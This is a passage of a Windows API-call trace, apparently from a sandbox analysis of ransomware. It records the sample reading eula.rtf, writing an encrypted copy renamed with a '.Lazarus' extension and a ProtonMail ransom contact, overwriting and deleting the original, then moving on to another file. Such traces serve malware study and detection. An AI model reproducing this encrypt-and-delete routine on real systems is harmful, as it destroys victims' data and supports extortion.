Context=0x0) returned 1 [0065.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0065.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.833] AreFileApisANSI () returned 1 [0065.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0065.833] AreFileApisANSI () returned 1 [0065.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0065.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0065.833] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.833] GetFileType (hFile=0x420) returned 0x1 [0065.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0065.834] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0065.834] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0065.834] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0065.834] CloseHandle (hObject=0x420) returned 1 [0065.834] AreFileApisANSI () returned 1 [0065.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0065.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0065.834] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.834] GetFileType (hFile=0x420) returned 0x1 [0065.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0065.835] CloseHandle (hObject=0x420) returned 1 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0065.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0065.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0065.836] AreFileApisANSI () returned 1 [0065.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0065.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0065.836] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74)) returned 1 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0065.836] AreFileApisANSI () returned 1 [0065.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0065.836] GetLastError () returned 0x0 [0065.836] SetLastError (dwErrCode=0x0) [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b798 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0065.836] GetLastError () returned 0x0 [0065.836] SetLastError (dwErrCode=0x0) [0065.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0065.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0065.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0065.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0065.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0065.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0065.837] AreFileApisANSI () returned 1 [0065.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0065.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0065.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0065.837] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.937] GetFileType (hFile=0x420) returned 0x1 [0065.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0065.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0065.938] AreFileApisANSI () returned 1 [0065.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0065.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0065.938] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.938] GetFileType (hFile=0x428) returned 0x1 [0065.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0065.938] GetLastError () returned 0x0 [0065.938] SetLastError (dwErrCode=0x0) [0065.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0065.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.938] ReadFile (in: hFile=0x428, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f030*=0xc74, lpOverlapped=0x0) returned 1 [0065.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0065.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0065.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] ReadFile (in: hFile=0x428, lpBuffer=0x8d648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0065.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0065.941] GetLastError () returned 0x0 [0065.941] SetLastError (dwErrCode=0x0) [0065.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0065.941] WriteFile (in: hFile=0x420, lpBuffer=0x84fb8*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesWritten=0x327ef70*=0xc80, lpOverlapped=0x0) returned 1 [0065.942] GetLastError () returned 0x0 [0065.942] SetLastError (dwErrCode=0x0) [0065.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0065.942] GetLastError () returned 0x0 [0065.942] SetLastError (dwErrCode=0x0) [0065.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0065.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0065.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0065.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0065.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0065.943] CloseHandle (hObject=0x420) returned 1 [0065.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.944] CloseHandle (hObject=0x428) returned 1 [0065.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0065.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0065.944] AreFileApisANSI () returned 1 [0065.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0065.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0065.944] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.945] GetFileType (hFile=0x428) returned 0x1 [0065.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0065.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0065.946] GetLastError () returned 0xb7 [0065.946] SetLastError (dwErrCode=0xb7) [0065.946] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0065.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0065.947] CloseHandle (hObject=0x428) returned 1 [0065.947] AreFileApisANSI () returned 1 [0065.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0065.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 36 [0065.947] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0065.948] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.949] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.949] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0065.949] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0065.949] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.950] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0065.950] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0065.950] AreFileApisANSI () returned 1 [0065.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 